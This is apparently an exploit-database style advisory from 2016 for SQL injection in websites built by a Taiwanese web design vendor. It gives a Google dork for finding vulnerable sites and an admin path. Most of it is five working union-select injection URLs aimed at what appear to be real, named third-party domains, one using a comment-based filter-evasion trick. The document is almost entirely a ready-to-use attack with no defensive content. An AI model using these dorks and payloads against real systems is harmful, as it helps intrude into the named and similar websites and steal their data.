######################
# Exploit Title : Design By EZTRUST SQL injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.eztrust.com.tw/
# Google Dork : intext:"藝誠科技" inurl:show.php
# Date: 2016 21 October
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# admin page : target/admin/
# demos :
# http://www.shichiart.com.tw/html/artist/show.php?num=12&kind=-1+union+select+version()--%20-&page=1%27
# http://www.wellnux.com/html/news/show.php?show=0&find=&find2=&chkkey01=&chkkey02=&find3=-C%27+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--%20-
# http://cabital.com.tw/html/news/show.php?show=0&class='
# http://0800072222.tw/mdbio_new/webc/html/product/02.php?kind=%5c&page=2
# http://www.pcmups.com.tw/eB/html/product/show.php?num=-15+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
######################
# discovered by : modiret
######################